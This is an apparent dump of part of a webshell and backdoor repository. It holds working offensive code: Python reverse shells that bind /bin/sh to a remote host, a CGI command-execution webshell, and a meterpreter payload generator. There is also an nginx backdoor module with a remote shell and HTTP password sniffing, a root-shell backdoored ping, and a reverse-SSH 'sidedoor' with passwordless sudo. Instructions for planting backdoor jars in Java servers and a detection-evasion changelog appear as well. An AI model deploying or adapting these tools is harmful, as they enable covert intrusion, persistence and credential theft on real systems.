| Restart=on-failure 10 | 11 | [Install] 12 | WantedBy=multi-user.target 13 | -------------------------------------------------------------------------------- /SSH/sidedoor/debian/sidedoor.upstart: -------------------------------------------------------------------------------- 1 | description "maintain reverse tunnel" 2 | 3 | start on (local-filesystems and net-device-up IFACE!=lo) 4 | 5 | respawn 6 | 7 | setuid sidedoor 8 | 9 | script 10 | [ -f /etc/default/sidedoor ] && . /etc/default/sidedoor 11 | exec /usr/bin/sidedoor "$REMOTE_SERVER" "$TUNNEL_PORT" "$LOCAL_PORT" 12 | end script 13 | -------------------------------------------------------------------------------- /SSH/sidedoor/debian/source/format: -------------------------------------------------------------------------------- 1 | 3.0 (native) 2 | -------------------------------------------------------------------------------- /SSH/sidedoor/sidedoor: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | set -eu 4 | 5 | if [ $# -ne 2 -a $# -ne 3 ]; then 6 | echo "Usage: $(basename $0) REMOTE_SERVER TUNNEL_PORT [LOCAL_PORT]" 7 | echo 8 | echo "Maintain a reverse SSH tunnel." 9 | exit 65 10 | fi 11 | 12 | REMOTE_SERVER="$1" 13 | TUNNEL_PORT="$2" 14 | LOCAL_PORT="${3:-$(awk '/^Port/ {print $2}' /etc/ssh/sshd_config)}" 15 | 16 | exec autossh -M 0 -NT \ 17 | -R "${TUNNEL_PORT}:localhost:${LOCAL_PORT}" \ 18 | "$REMOTE_SERVER" 19 | -------------------------------------------------------------------------------- /SSH/sidedoor/ssh_client_config_example: -------------------------------------------------------------------------------- 1 | Host MY_HOSTNAME 2 | User sidedoor 3 | #IdentityFile # Optionally specify a different private key. 4 | ProxyCommand ssh REMOTE_SERVER nc localhost TUNNEL_PORT 5 | -------------------------------------------------------------------------------- /SSH/sidedoor/sudoers: -------------------------------------------------------------------------------- 1 | sidedoor ALL=(ALL) NOPASSWD: ALL 2 | -------------------------------------------------------------------------------- /Udp/LiveHack/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | # Copyright (C) 2007 Nathan Ramella (nar@remix.net) 3 | # 4 | # This library is free software; you can redistribute it and/or 5 | # modify it under the terms of the GNU Lesser General Public 6 | # License as published by the Free Software Foundation; either 7 | # version 2.1 of the License, or (at your option) any later version. 8 | # 9 | # This library is distributed in the hope that it will be useful, 10 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 12 | # Lesser General Public License for more details. 13 | # 14 | # You should have received a copy of the GNU Lesser General Public 15 | # License along with this library; if not, write to the Free Software 16 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 17 | # 18 | # For questions regarding this module contact 19 | # Nathan Ramella or visit http://www.liveapi.org 20 | """ 21 | 22 | import sys 23 | import Live 24 | 25 | #path = "/Users/ST8/Production/Arduinome/Dev/LiveOSC" 26 | #errorLog = open(path + "/stderr.txt", "w") 27 | #errorLog.write("Starting Error Log") 28 | #sys.stderr = errorLog 29 | #stdoutLog = open(path + "/stdout.txt", "w") 30 | #stdoutLog.write("Starting Standard Out Log") 31 | #sys.stdout = stdoutLog 32 | 33 | from livehack import LiveHack 34 | 35 | def create_instance(c_instance): 36 | return LiveHack(c_instance) 37 | -------------------------------------------------------------------------------- /Udp/LiveHack/logger.py: -------------------------------------------------------------------------------- 1 | 2 | dst = "C:/Users/nAkoustix/Desktop/log.txt" 3 | 4 | logfile = open(dst,"w") 5 | logfile.close() 6 | 7 | def debug(msg): 8 | logfile = open(dst, "a") 9 | logfile.write(msg + "\n") 10 | logfile.close() 11 | -------------------------------------------------------------------------------- /Udp/LiveHack/udpio.py: -------------------------------------------------------------------------------- 1 | #try: 2 | # from _io import StringIO 3 | #except: 4 | #from io import StringIO 5 | import socket 6 | from logger import debug 7 | 8 | class UDPOut(): 9 | def __init__(self, address, port): 10 | #super(UDPOut, self).__init__("", "\n") 11 | self.address = address 12 | self.port = port 13 | self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 14 | 15 | def write(self, s): 16 | try: 17 | self.socket.sendto(s.encode("utf-8"), (self.address, self.port)) 18 | #debug("udpwrite successfull") 19 | except Exception, e: 20 | debug("udpwrite failed") 21 | debug(s) 22 | debug(str(e)) 23 | 24 | 25 | def close(self): 26 | self.socket.close() 27 | -------------------------------------------------------------------------------- /WeBaCoo/CHANGELOG: -------------------------------------------------------------------------------- 1 | Version 0.2.3 [11 March 2012] 2 | 3 | + Single command execution mode (-e flag) 4 | + Multi HTTP methods suppot (-m flag) 5 | + Execute external CMDs inside main console 6 | + Download extension module 7 | + Stealth extension module 8 | + Fix color print bug under Windows OS 9 | 10 | 11 | Version 0.2.2 [29 January 2012] 12 | 13 | + Executed command logging to external file 14 | + Postgres CLI extension module 15 | + Upload extension module 16 | 17 | 18 | Version 0.2.1 [23 January 2012] 19 | 20 | + MySQL CLI support 21 | + Support for extension modules 22 | 23 | 24 | Version 0.2 [19 December 2011] 25 | 26 | + Built in Tor proxy support. 27 | + New random delimiter string for each request. 28 | + Newer version check & update. 29 | + Enhanced error handling. 30 | 31 | 32 | Version 0.1.4 [17 December 2011] 33 | 34 | + Insert dummy spaces at base64 obfuscated code, to bypass 35 | statistical detection methdos. 36 | + Added initial user ID print info. 37 | + Added check for disabled PHP system functions. 38 | 39 | 40 | Version 0.1.3 [13 December 2011] 41 | 42 | + Protect base64 decoder function in backdoor code. 43 | + Fix URI escaped character bug. 44 | + Fix server's response empty HTTP data bug. 45 | 46 | 47 | Version 0.1.2 [6 December 2011] 48 | 49 | + Add verbose support with 3 levels to print out requests/responses 50 | HTTP headers or/and data. 51 | + Add support for HTTP proxies with basic authentication. 52 | + Fix minor bug at output buffer. 53 | 54 | 55 | Version 0.1.1 [30 November 2011] 56 | 57 | + Add 4xx HTTP status error code handling. 58 | 59 | 60 | Version 0.1 [29 November 2011] 61 | 62 | + Initial release 63 | -------------------------------------------------------------------------------- /WeBaCoo/MSF_README: -------------------------------------------------------------------------------- 1 | INTRO 2 | ===== 3 | WeBaCoo metasploit module was created in order to provide a quick communication 4 | channel with the compromised server, using the framework's flexible features. 5 | Using this exploit module, you do not need to run WeBaCoo under terminal mode 6 | to establish a remote shell with the server. 7 | 8 | MSF PAYLOADS 9 | ============ 10 | The module's available payload list, includes those capable to run under WeBaCoo 11 | communication model without any further customizations. Although, feel free to 12 | customize the other's too. 13 | In case you need a more feature-rich payload (like meterpreter) you can run 14 | WeBaCoo under terminal mode and use the 'Upload' extension module, to upload 15 | the generated payload to the server and interract with the framework. 16 | -------------------------------------------------------------------------------- /WeBaCoo/TODO: -------------------------------------------------------------------------------- 1 | Things TODO for Next Releases: 2 | 3 | 4 | * Implement a rich feature terminal emulator. 5 | 6 | + Enhance features when running under Windows OS. 7 | 8 | * Cluster mode support for multi targets. 9 | 10 | * Expand extension module library. 11 | 12 | * Target enumeration functions. 13 | 14 | * Support for other web frameworks. 15 | -------------------------------------------------------------------------------- /gdog/.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | 27 | # PyInstaller 28 | # Usually these files are written by a python script from a template 29 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 30 | *.manifest 31 | *.spec 32 | 33 | # Installer logs 34 | pip-log.txt 35 | pip-delete-this-directory.txt 36 | 37 | # Unit test / coverage reports 38 | htmlcov/ 39 | .tox/ 40 | .coverage 41 | .coverage.* 42 | .cache 43 | nosetests.xml 44 | coverage.xml 45 | *,cover 46 | .hypothesis/ 47 | 48 | # Translations 49 | *.mo 50 | *.pot 51 | 52 | # Django stuff: 53 | *.log 54 | 55 | # Sphinx documentation 56 | docs/_build/ 57 | 58 | # PyBuilder 59 | target/ 60 | 61 | #Ipython Notebook 62 | .ipynb_checkpoints 63 | 64 | # PyDev 65 | RemoteSystemsTempFiles 66 | .project 67 | .pydevproject 68 | .metadata 69 | .settings 70 | *.prefs 71 | 72 | -------------------------------------------------------------------------------- /gdog/data/.gitignore: -------------------------------------------------------------------------------- 1 | * 2 | !.gitignore 3 | -------------------------------------------------------------------------------- /gdog/requirements.txt: -------------------------------------------------------------------------------- 1 | pycrypto 2 | wmi 3 | enum34 4 | netifaces -------------------------------------------------------------------------------- /gdog/shellcode_generate.py: -------------------------------------------------------------------------------- 1 | # quick script that generates the proper format for the shellcode to feed into pyinjector 2 | # generates powershell payload from @trustedsec pyinjector 3 | import subprocess,re 4 | def generate_powershell_shellcode(payload,ipaddr,port): 5 | # grab the metasploit path 6 | msf_path = "/usr/local/share/metasploit-framework/" 7 | # generate payload 8 | proc = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s -a x86 --platform Windows EXITFUNC=thread -f python" % (msf_path,payload,ipaddr,port), stdout=subprocess.PIPE, shell=True) 9 | data = proc.communicate()[0] 10 | # start to format this a bit to get it ready 11 | data = data.replace(";", "") 12 | data = data.replace(" ", "") 13 | data = data.replace("+", "") 14 | data = data.replace('"', "") 15 | data = data.replace("\n", "") 16 | data = data.replace("buf=", "") 17 | data = data.rstrip() 18 | # base counter 19 | print data 20 | 21 | 22 | generate_powershell_shellcode("windows/meterpreter/reverse_tcp", "172.16.153.1", "4444") -------------------------------------------------------------------------------- /icmp/icmpsh.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/icmp/icmpsh.exe -------------------------------------------------------------------------------- /icmp/screenshots/response_packet_from_icmpsh_slave_containing_output_of_command_whoami.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/icmp/screenshots/response_packet_from_icmpsh_slave_containing_output_of_command_whoami.png -------------------------------------------------------------------------------- /icmp/screenshots/running_icmpsh_master_on_attacker_machine.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/icmp/screenshots/running_icmpsh_master_on_attacker_machine.png -------------------------------------------------------------------------------- /icmp/screenshots/running_icmpsh_slave_on_target.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/icmp/screenshots/running_icmpsh_slave_on_target.png -------------------------------------------------------------------------------- /jar/readme.txt: -------------------------------------------------------------------------------- 1 | 在apache-tomcat-5.5.27\conf\web.xml的session-config后面加上一个filter或者servlet即可全局过滤: 2 | 3 | HttpServletWrapper 4 | javax.servlet.web.http.HttpServletWrapper 5 | 6 | 7 | HttpServletWrapper 8 | /servlet/HttpServletWrapper 9 | 10 | url-pattern表示默认需要过滤的请求后缀。 11 | 需要把jar复制到tomcat的lib目录,项目启动的时候会自动加载jar的filter或者filter 12 | Resin配置需要修改E:\soft\resin-pro-3.1.13\conf\app-default.xml,在resin-xtp的servler后面加上对应的filter或者servlet并把E:\soft\resin-pro-3.1.13\lib放入后门的jar包: 13 | 14 | Jetty配置,修改D:\Soft\Server\jetty-distribution-9.0.5.v20130815\etc\webdefault.xml文件,在default的servlet之前配置上面的filter和servler配置。 15 | 16 | Jar包:E:\soft\jetty-distribution-9.0.4.v20130625\lib 17 | -------------------------------------------------------------------------------- /jar/servlet-api-3.04.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/jar/servlet-api-3.04.jar -------------------------------------------------------------------------------- /misc/Asp_Aspx_Php_V1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/misc/Asp_Aspx_Php_V1.jpg -------------------------------------------------------------------------------- /misc/Asp_Aspx_Php_V2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/misc/Asp_Aspx_Php_V2.jpg -------------------------------------------------------------------------------- /misc/caidao-20141213.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/misc/caidao-20141213.zip -------------------------------------------------------------------------------- /misc/caidao-20160622.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/misc/caidao-20160622.zip -------------------------------------------------------------------------------- /misc/合成图片马命令.txt: -------------------------------------------------------------------------------- 1 | copy X.gif /b + X.txt/a X.gif -------------------------------------------------------------------------------- /misc/零魂PHP一句话木马客户端.htm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/misc/零魂PHP一句话木马客户端.htm -------------------------------------------------------------------------------- /openfire/openfire-test_plugin.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/openfire/openfire-test_plugin.zip -------------------------------------------------------------------------------- /openfire/readme.txt: -------------------------------------------------------------------------------- 1 | 上传压缩包插件 2 | WebShell:http://localhost/plugins/test/cmd.jsp 密码023 3 | -------------------------------------------------------------------------------- /osx/osx-ping-backdoor/README.md: -------------------------------------------------------------------------------- 1 | OS X Backdoored ping 2 | ==================== 3 | 4 | This is just the normal OS X `ping`, but if you run it with the flag `-X`, it drops a root shell. This relies on the `suid` bit being set, it's not an exploit and it won't help you root a server (which you shouldn't be doing anyway 😠). 5 | 6 | I didn't write the `ping` utility, this is just the normal OS X `ping`, the source code of which can be found [here](http://www.opensource.apple.com/source/network_cmds/network_cmds-329.2/ping.tproj/ping.c?txt). All I did was add the `-X` flag and the function `r00t()`. 7 | 8 | This program still works like the normal `ping`. It just has a little secret 😉 9 | 10 | # Compilation & Installation 11 | 12 | 1. `wget https://raw.githubusercontent.com/raincoats/osx-ping-backdoor/master/ping.c` 13 | 1. `gcc ping.c -o ping` 14 | 2. `chown root:wheel ./ping; chmod 4755 ./ping` 15 | 3. Optionally, `mv /sbin/ping{,-backup} && mv ./ping /sbin` (but I mean, really, are you sure you want a backdoor on your smackbook throw?) 16 | 17 | # Usage 18 | 19 | $ ./ping -X 20 | .----------------. 21 | |_I_I_I_I_I_I_I_I]___ 22 | | _ r00t! : ; _ ) 23 | ='-(_)----------=-(_)-' 24 | sh-3.2# whoami 25 | root 26 | sh-3.2# 27 | 28 | # Why did you even bother 29 | 30 | This is me attempting to learn a little C. Even though I didn't do much, I'm stoked that it compiles & works. So if you don't like it buzz off 🐝🐝🐝🐝 31 | -------------------------------------------------------------------------------- /pwnginx/README.md: -------------------------------------------------------------------------------- 1 | #[ Pwnginx ] - Pwn nginx 2 | 3 | Copyleft by t57root @ openwill.me 4 | 5 | <t57root@gmail.com> [www.HackShell.net](http://www.hackshell.net/) 6 | 7 | Usage: 8 | 9 | Get shell access via the nginx running @ [ip]:[port] 10 | 11 | ./pwnginx shell [ip] [port] [password] 12 | 13 | Get a socks5 tunnel listening at [socks5ip]:[socks5port] 14 | 15 | ./pwnginx socks5 [ip] [port] [password] [socks5ip] [socks5port] 16 | 17 | 18 | ###Features: 19 | 20 | * Remote shell access 21 | 22 | * Socks5 tunneling via existing http connection 23 | 24 | * Http password sniffing & logging 25 | 26 | ###INSTALL: 27 | 28 | * Compile the client: 29 | 30 | $ cd client;make 31 | 32 | * Edit source to hidden configure arguments: 33 | 34 | $ vim src/core/nginx.c 35 | 36 | Modify the `configure arguments` line into: `configure arguments: --prefix=/opt/nginx\n");` (original configure arguments shown in the result of `nginx -V`) 37 | 38 | * Recompile nginx: 39 | 40 | $ cd /path/to/nginx/source; ./configure --prefix=/opt/nginx --add-module=/path/to/pwnginx/module && make (There is no need to run `make install`) 41 | 42 | $ sudo cp -f objs/nginx /path/to/nginx/sbin/nginx 43 | 44 | * Restart nginx 45 | 46 | $ sudo killall nginx && /path/to/nginx/sbin/nginx 47 | 48 | 49 | ###TODO: 50 | 51 | * Pack communication traffic into HTTP protocol 52 | 53 | * Full pty support 54 | 55 | * Shell with root privilege(? There must be another stand-alone 'nginx: master process' running under root to support this function. Maybe that's too suspicious. Being considered.) 56 | -------------------------------------------------------------------------------- /pwnginx/client/Makefile: -------------------------------------------------------------------------------- 1 | CFLAGS = -lpthread -Wall 2 | pwnginx: functions.c 3 | 4 | clean: 5 | -rm pwnginx 6 | 7 | -------------------------------------------------------------------------------- /pwnginx/client/functions.h: -------------------------------------------------------------------------------- 1 | #ifndef FUNCTIONS_H 2 | #define FUNCTIONS_H 3 | 4 | int full_send(int fd,void *buf,int size); 5 | int full_recv(int fd,void *buf,int size); 6 | int init_connection(char *ip,char *port,int function); 7 | int exec_shell(int fd); 8 | int exec_socks5(); 9 | 10 | #endif 11 | 12 | -------------------------------------------------------------------------------- /pwnginx/client/pwnginx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/pwnginx/client/pwnginx -------------------------------------------------------------------------------- /pwnginx/client/pwnginx.c: -------------------------------------------------------------------------------- 1 | /* 2 | * pwnginx.c - pwnginx client 3 | * t57root@gmail.com 4 | * openwill.me / www.hackshell.net 5 | */ 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | #include "functions.h" 23 | 24 | 25 | char *password; 26 | char *ip; 27 | char *port; 28 | char *socks5ip; 29 | char *socks5port; 30 | 31 | int main(int argc,char **argv) 32 | { 33 | printf("[ Pwnginx ] - Pwn nginx\n" 34 | "Copyleft by t57root @ openwill.me\n" 35 | " [www.HackShell.net]\n\n" 36 | "Usage:\n" 37 | "Get a shell access via the nginx running @ [ip]:[port]\n\t%s shell [ip] [port] [password]\n" 38 | "Get a socks5 tunnel listening at [socks5ip]:[socks5port]\n\t%s socks5 [ip] [port] [password] [socks5ip] [socks5port]\n" 39 | ,argv[0],argv[0]); 40 | char *action = argv[1]; 41 | ip = argv[2]; 42 | port = argv[3]; 43 | password = argv[4]; 44 | 45 | int function = 0; 46 | 47 | if((argc==5 && strncmp(action,"shell",5)==0)){ 48 | function = 1; 49 | printf("\n[i] Obtaining shell access\n"); 50 | } 51 | else if((argc==7 && strncmp(action,"socks5",6)==0)){ 52 | function = 2; 53 | socks5ip = argv[5]; 54 | socks5port = argv[6]; 55 | printf("\n[i] Obtaining a socks5 proxy tunnel\n"); 56 | } 57 | else return 0; 58 | 59 | printf("[i] About to connect to nginx\n"); 60 | 61 | int fd = init_connection(ip,port,function); 62 | if(fd<0){ 63 | return -1; 64 | } 65 | 66 | if(function==1){ 67 | exec_shell(fd); 68 | } 69 | else if(function==2){ 70 | close(fd); 71 | exec_socks5(); 72 | } 73 | 74 | return 0; 75 | } 76 | -------------------------------------------------------------------------------- /pwnginx/module/config: -------------------------------------------------------------------------------- 1 | ngx_addon_name=ngx_http_pwnginx 2 | HTTP_AUX_FILTER_MODULES="$HTTP_AUX_FILTER_MODULES ngx_http_pwnginx" 3 | NGX_ADDON_SRCS="$NGX_ADDON_SRCS $ngx_addon_dir/ngx_http_pwnginx.c $ngx_addon_dir/pwnginx.c" 4 | -------------------------------------------------------------------------------- /pwnginx/module/config.h: -------------------------------------------------------------------------------- 1 | #ifndef CONFIG_H 2 | #define CONFIG_H 3 | 4 | #define PASSWORD "t57root" 5 | #define PWD_SNIFF_FILE "/tmp/.web_sniff" 6 | #define ROOTSHELL 7 | 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /pwnginx/module/pwnginx.h: -------------------------------------------------------------------------------- 1 | #ifndef FUNCTIONS_H 2 | #define FUNCTIONS_H 3 | 4 | int mrecv(int fd, void *buffer, int length); 5 | int msend(int fd, void *buffer, int length); 6 | int exec_shell(int fd); 7 | int exec_socks5(int fd); 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /pwnginx/module/socks5.h: -------------------------------------------------------------------------------- 1 | //Based on http://www.ietf.org/rfc/rfc1928.txt 2 | //HTTP:http://www.ietf.org/rfc/rfc2616.txt 3 | #ifndef SOCKS5_H 4 | #define SOCKS5_H 5 | 6 | /**** 7 | +----+----------+----------+ 8 | |VER | NMETHODS | METHODS | 9 | +----+----------+----------+ 10 | | 1 | 1 | 1 to 255 | 11 | +----+----------+----------+ 12 | ****/ 13 | typedef struct 14 | { 15 | char ver; 16 | char nmethods; 17 | char methods[255]; 18 | }SELECT,*pSELECT; 19 | 20 | /**** 21 | +----+--------+ 22 | |VER | METHOD | 23 | +----+--------+ 24 | | 1 | 1 | 25 | +----+--------+ 26 | ****/ 27 | typedef struct 28 | { 29 | char ver; 30 | char method; 31 | }SELECT_RESPONSE,*pSELECT_RESPONSE; 32 | 33 | /**** 34 | +----+-----+-------+------+----------+----------+ 35 | |VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT | 36 | +----+-----+-------+------+----------+----------+ 37 | | 1 | 1 | X'00' | 1 | Variable | 2 | 38 | +----+-----+-------+------+----------+----------+ 39 | ****/ 40 | typedef struct 41 | { 42 | char ver; 43 | char cmd; 44 | char rsv; 45 | char atyp; 46 | char addr; 47 | //Other sections 48 | }REQUEST,*pREQUEST; 49 | 50 | /**** 51 | +----+-----+-------+------+----------+----------+ 52 | |VER | REP | RSV | ATYP | BND.ADDR | BND.PORT | 53 | +----+-----+-------+------+----------+----------+ 54 | | 1 | 1 | X'00' | 1 | Variable | 2 | 55 | +----+-----+-------+------+----------+----------+ 56 | ****/ 57 | typedef struct 58 | { 59 | char ver; 60 | char rep; 61 | char rsv; 62 | char atyp; 63 | char bndAddr[4]; 64 | char bndPort[2]; 65 | }REQUEST_RESPONSE,*pREQUEST_RESPONSE; 66 | 67 | #endif 68 | 69 | -------------------------------------------------------------------------------- /python/darkBC.py.txt: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # This was written for educational purpose and pentest only. Use it at your own risk. 3 | # Author will be not responsible for any damage! 4 | # !!! Special greetz for my friend sinner_01 !!! 5 | # Toolname : darkBC.py 6 | # Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com> 7 | # Version : 0.1 8 | # Greetz for rsauron and low1z, great python coders 9 | # greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft, c0ax, b0ne and all members of ex darkc0de.com, ljuska.org & darkartists.info 10 | # 11 | 12 | import sys, socket, os, subprocess 13 | 14 | host = sys.argv[1] 15 | port = int(sys.argv[2]) 16 | 17 | socket.setdefaulttimeout(60) 18 | 19 | def bc(): 20 | try: 21 | sok = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 22 | sok.connect((host,port)) 23 | sok.send(''' 24 | b4ltazar@gmail.com 25 | Ljuska.org \n\n''') 26 | os.dup2(sok.fileno(),0) 27 | os.dup2(sok.fileno(),1) 28 | os.dup2(sok.fileno(),2) 29 | os.dup2(sok.fileno(),3) 30 | shell = subprocess.call(["/bin/sh","-i"]) 31 | except socket.timeout: 32 | print "[!] Connection timed out" 33 | except socket.error, e: 34 | print "[!] Error while connecting", e 35 | 36 | bc() 37 | 38 | 39 | -------------------------------------------------------------------------------- /python/llehs.py: -------------------------------------------------------------------------------- 1 | # encoding=utf8 2 | # by enisoc 2009-13-79 12:73:-12 3 | 4 | import os 5 | import time 6 | import socket 7 | import urllib,urllib2 8 | 9 | FILE_NAME = 'llehs.py' 10 | 11 | def escape(content): 12 | content = content.replace("&", "&") 13 | content = content.replace("<", "<") 14 | content = content.replace(">", ">") 15 | if 0: 16 | content = content.replace('"', """) 17 | return content 18 | def get(name): 19 | q_str = os.environ['QUERY_STRING'] 20 | q_list = q_str.split('&') 21 | for q in q_list: 22 | if q.split('=')[0].lower() == name: 23 | value = q.split('=')[1].replace('+',' ') 24 | return urllib.unquote(value) 25 | 26 | try: 27 | cmd = get('cmd') 28 | if not cmd: 29 | cmd = 'id' 30 | cmd_result = os.popen(cmd).read() 31 | except Exception,e: 32 | cmd_result = str(e) 33 | 34 | print """Content-type: text/html 35 | 36 | 37 | 38 | 39 | 40 | llehs << 41 | 49 | 50 | 51 | 52 |
    53 | 54 | 55 |

    56 | """ 57 | print "-------------------------------------
    " 58 | print escape(cmd_result).strip().replace(os.linesep,'
    ') 59 | print "
    -------------------------------------
    " 60 | print """@xeyeteam 2009. linux shell""" 61 | -------------------------------------------------------------------------------- /python/python3/about.txt: -------------------------------------------------------------------------------- 1 | 2 | \ \ / /__ _ _ _ __ (_) ___ _ __ ___| _ \ 3 | \ V / _ \| | | | '_ \| |/ _ \| '_ \ / _ \ |_) | 4 | | | (_) | |_| | | | | | (_) | | | | __/ _ < 5 | |_|\___/ \__,_|_| |_|_|\___/|_| |_|\___|_| \_\ 6 | 7 | 8 | Younioner Version 1.1 - created by Ayoub Ouakkaha. 9 | the ide behind the project is to make a simple tool let you take controle over your devices. 10 | up to now Younioner project is just a reverse shell, but i hope i could add this features in incoming release 11 | * G.U.I support : yes i plan to make the project support graphical user interface.. 12 | * Key Capture: yes younioner will include the key capture feature probably this feature will work only in windows.. but we will sya :) 13 | * Screen Capture 14 | * Executable Client: you'll have the option to genrate either client.py or client.exe 15 | 16 | please help us to develope the next version of Younioner 1.2 17 | for more contact me on : 18 | ayoub.ouakkaha@gmail.com 19 | thanks in advance. 20 | -------------------------------------------------------------------------------- /python/python3/setup.py: -------------------------------------------------------------------------------- 1 | from distutils.core import setup 2 | 3 | setup(console=['Client.py']) 4 | -------------------------------------------------------------------------------- /python/sctp_reverse.py.txt: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # SCTP Reverse Shell (TCP mode) 3 | # Requires pysctp and sctp to be working 4 | # on the victim box. 5 | # My perfect saturday... Involves # 6 | # infodox - Insecurety Research 2013 7 | # insecurety.net | @info_dox 8 | 9 | # I probably imported too much things. Who cares. 10 | import socket 11 | import _sctp 12 | import sctp 13 | from sctp import * 14 | import os 15 | import subprocess 16 | 17 | host = '127.0.0.1' # CHANGEME 18 | port = 1337 # CHANGEME 19 | 20 | socket.setdefaulttimeout(60) 21 | s = None 22 | try: 23 | s = sctpsocket_tcp(socket.AF_INET) 24 | s.connect((host,port)) 25 | s.send('g0tsh3ll!\n') 26 | save = [ os.dup(i) for i in range(0,3) ] 27 | os.dup2(s.fileno(),0) 28 | os.dup2(s.fileno(),1) 29 | os.dup2(s.fileno(),2) 30 | shell = subprocess.call(["/bin/sh","-i"]) 31 | [ os.dup2(save[i],i) for i in range(0,3)] 32 | [ os.close(save[i]) for i in range(0,3)] 33 | os.close(s.fileno()) 34 | except Exception: 35 | print "Connection Failed! Is there even a listener?" 36 | pass 37 | -------------------------------------------------------------------------------- /python/xshock-0.1.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/WebShell/f7cd87feb5ef0375fc7a7cbcfea15713a3fb5c5b/python/xshock-0.1.tar.gz -------------------------------------------------------------------------------- /reGeorg-master/LICENSE.html: -------------------------------------------------------------------------------- 1 | Creative Commons License
    SensePost reGeorg by Willem Mouton is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.
    Permissions beyond the scope of this license may be available at willem@sensepost.com 2 | -------------------------------------------------------------------------------- /reGeorg-master/LICENSE.txt: -------------------------------------------------------------------------------- 1 | This work is licensed under the Creative Commons 2 | Attribution-Non Commercial-ShareAlike 4.0 International 3 | License. To view a copy of this license, visit 4 | 5 | http://creativecommons.org/licenses/by-nc-sa/4.0/deed.en_US. 6 | -------------------------------------------------------------------------------- /reGeorg-master/README.md: -------------------------------------------------------------------------------- 1 | reGeorg 2 | ========= 3 | 4 | ``` _____ 5 | _____ ______ __|___ |__ ______ _____ _____ ______ 6 | | | | ___|| ___| || ___|/ \| | | ___| 7 | | \ | ___|| | | || ___|| || \ | | | 8 | |__|\__\|______||______| __||______|\_____/|__|\__\|______| 9 | |_____| 10 | ... every office needs a tool like Georg 11 | ``` 12 | willem@sensepost.com / [@\_w\_m\_\_] 13 | 14 | sam@sensepost.com / [@trowalts] 15 | 16 | etienne@sensepost.com / [@kamp_staaldraad] 17 | 18 | 19 | Version 20 | ---- 21 | 22 | 1.0 23 | 24 | Dependencies 25 | ----------- 26 | 27 | reGeorg requires Python 2.7 and the following modules: 28 | 29 | * [urllib3] - HTTP library with thread-safe connection pooling, file post, and more. 30 | 31 | 32 | Usage 33 | -------------- 34 | 35 | ``` 36 | $ reGeorgSocksProxy.py [-h] [-l] [-p] [-r] -u [-v] 37 | 38 | Socks server for reGeorg HTTP(s) tunneller 39 | 40 | optional arguments: 41 | -h, --help show this help message and exit 42 | -l , --listen-on The default listening address 43 | -p , --listen-port The default listening port 44 | -r , --read-buff Local read buffer, max data to be sent per POST 45 | -u , --url The url containing the tunnel script 46 | -v , --verbose Verbose output[INFO|DEBUG] 47 | 48 | ``` 49 | 50 | * **Step 1.** 51 | Upload tunnel.(aspx|ashx|jsp|php) to a webserver (How you do that is up to 52 | you) 53 | 54 | * **Step 2.** 55 | Configure you tools to use a socks proxy, use the ip address and port you 56 | specified when 57 | you started the reGeorgSocksProxy.py 58 | 59 | ** Note, if you tools, such as NMap doesn't support socks proxies, use 60 | [proxychains] (see wiki) 61 | 62 | * 